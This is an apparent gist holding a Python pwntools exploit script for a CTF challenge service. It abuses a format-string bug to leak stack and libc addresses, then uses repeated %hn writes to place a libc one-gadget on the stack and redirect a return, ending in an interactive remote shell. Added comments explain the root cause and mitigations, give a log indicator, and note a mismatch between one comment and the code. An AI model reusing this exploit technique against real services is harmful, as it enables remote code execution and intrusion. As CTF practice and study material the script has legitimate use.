@pccr10001
Created December 29, 2017 10:00
#!/usr/bin/python
from pwn import *
# Python 2 / str-based pwntools script: every send() below is handed a str
# literal, which a Python 3 pwntools would reject without bytes conversion.
context.arch='amd64'
# All traffic below goes through this single socket to the challenge service.
r = remote('csie.ctf.tw',10136)
r.recvuntil(':')
# Leak
# The service evidently passes the attacker-controlled input as the format
# argument of a printf-family call, so positional "%N$p" specifiers print raw
# pointers from the call's argument slots.  Defender's view: the root cause is
# printf(buf) instead of printf("%s", buf); -Wformat-security and
# _FORTIFY_SOURCE flag/abort exactly this class of bug.
r.send('%p,%3$p,%11$p')
# Read the reply up to the next 'I', drop the trailing two characters, and
# split on ',' to get the three hex strings.  No validation: a reply in any
# other shape makes the int() calls below raise ValueError.
addrs=r.recvuntil('I').strip()[:-2].split(',')
# Rebase the leaks.  The subtracted constants are the author's offsets from
# the leaked pointers to the binary's and libc's load bases; they are specific
# to this binary/libc build and cannot be checked from this script.
text = int(addrs[0],16) - 0x201020
libc = int(addrs[1],16) - 0x11755c
# The third leak is treated as a saved frame pointer and the stack pointer is
# derived from it by a fixed distance (author's assumption, not checked at
# runtime).
bp_chain = int(addrs[2],16)
rsp = bp_chain - 0x100
#set value in memory
def edit(addr, v):
    """Write the 16-bit value ``v`` to address ``addr`` with two format-string writes.

    Each write re-uses the same format-string bug: ``%<count>c`` advances
    printf's character counter to ``count`` and ``%N$hn`` stores the low 16
    bits of that counter through the pointer in positional argument ``N``.
    The first send stores the low half of ``addr`` through slot 11; the second
    stores ``v`` through slot 37.  The linkage the author relies on — that slot
    11 points at the stack word which is itself read as slot 37, so the first
    write redirects the second — is inferred from the ``%11$p`` leak and is not
    verifiable from this file.  Only the low 16 bits of ``addr`` are written,
    so ``addr`` must share its upper bits with the pointer already in that word.
    Uses the module-level socket ``r``; each send is preceded by draining the
    service prompt up to ':'.
    """
    # Low half of the target address; becomes the padding width, hence the
    # counter value that %hn stores.
    n = addr & 0xffff
    r.recvuntil(':')
    r.send('%' + str(n) + 'c%11$hn')
    # A width of 0 still prints one character, so a zero counter cannot be
    # requested directly; 65536 wraps to 0 in the 16-bit %hn store.
    if v == 0:
        v = 65536
    r.recvuntil(':')
    r.send('%' + str(v) + 'c%37$hn')
# Stage the stack frame.  Every offset from rsp below is the author's layout
# for this particular binary; nothing is validated at runtime, so a wrong
# leak or offset simply corrupts the remote stack.
i = rsp + 0x8 + 0xc
edit(i,0xffff)
#one gadget
# libc+0x4526a is the author's chosen "one gadget" offset; it is tied to the
# exact libc build behind the leak and is meaningless for any other build.
gadget=libc+0x4526a
# The 8-byte gadget address goes in as four little-endian 16-bit halves
# starting at rsp+0x8.
edit(rsp+0x8,gadget&0xffff)
edit(rsp+0xA,(gadget>>16)&0xffff)
edit(rsp+0xC,(gadget>>32)&0xffff)
edit(rsp+0xE,(gadget>>48)&0xffff)
#rsp+0x30 = 0
# NOTE(review): the comment says rsp+0x30 but the code zeroes the 8 bytes at
# rsp+0x40 — presumably a precondition of the gadget; confirm which is meant.
edit(rsp+0x40,0)
edit(rsp+0x40+0x2,0)
edit(rsp+0x40+0x4,0)
edit(rsp+0x40+0x6,0)
# Only the low 16 bits of the word at rsp are redirected to text+0x7c1, a
# location in the binary the author picked (likely a return site leading into
# the frame staged above — not verifiable from here).
ret = text+0x7c1
edit(rsp,ret&0xffff)
# Hand the socket to the user once the writes are done.  From the service
# side, inputs of the form '%<n>c%<k>$hn' are a high-signal indicator of this
# primitive in request logs.
r.interactive()